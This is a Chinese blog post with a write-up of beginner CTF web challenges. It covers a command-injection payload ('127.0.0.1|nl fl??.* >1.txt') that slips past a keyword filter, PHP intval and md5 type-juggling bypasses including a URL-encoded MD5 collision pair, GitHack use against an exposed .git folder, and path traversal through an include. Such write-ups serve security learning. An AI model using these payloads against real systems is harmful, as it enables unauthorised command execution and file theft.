M21in的博客

分享和学习

0%

?ctf writeup

发表于 更新于

week1

前端小游戏

常规思路,小游戏题目找game.js

有一串base64,解码就是flag

ping

一个ping的页面,常规思路

127.0.0.1后面接|然后接命令

127.0.01|ls

看到flag.txt就在当前目录下,这里1.txt是我显示flag的文件

然后fuzz了一下,发现过滤了flag字符,用通配符代替

127.0.0.1|nl fl??.* >1.txt

访问1.txt就有flag了

Gitttttttt

题目提示说/.git文件夹,github有现成的工具

Githack直接梭哈

from_http

http请求,一层层改

secret of php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
highlight_file(__FILE__);
include("flag.php");
$a = $_GET['a'];

if (isset($a)){
    if($a === "2025") {
        die("no");
    } else {
        echo "<br>"."yes"."<br>";
    }
    if(intval($a,0) === 2025) {
        echo "yes yes"."<br>";
        echo "Congratulations! You have passed the first level, the next level is ".$path."<br>";
    } else {
        die("no no");
    }
} else {
    echo "a is not set"."<br>";
}

传参?a=2025. 成功,提示下一层在 /Flll4g.php 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<?php
highlight_file(__FILE__);
include('flag.php');
$a = $_POST['a'];
$b = $_POST['b'];

if (isset($a) && isset($b)){
    if ($a !== $b && md5($a) == md5($b)){
        echo "<br>yes<br>";
    } else {
        die("no");
    }
    $a = $_REQUEST['aa'];
    $b = $_REQUEST['bb'];
    if ($a !== $b && md5((string)$a) === md5((string)$b)){
        echo "yes yes<br>";
    } else {
        die("no no");
    }
    $a = $_REQUEST['aaa'];
    $b = $_REQUEST['bbb'];
    if ((string)$a !== (string)$b && md5((string)$a) === md5((string)$b)){
        echo "yes yes yes<br>";
        echo "Congratulations! You have passed the second level, the flag is ".$flag."<br>";
    } else {
        die("no no no");
    }
} else {
    echo "a or b is not set<br>";
}

a,b传参和aa bb传参一眼md5数组绕过秒了,aaa和bbb秒不了,数组被转换成字符串会变成array

这里可以用md5碰撞字符串

aaa=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&bbb=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

包含不明东西的食物?!

include文件包含

源代码提示说flag在flag.txt

直接传参没有,想到以前做的题,会不会是目录穿越

然后试了一下,有这个洞

换成flag.txt就是flag了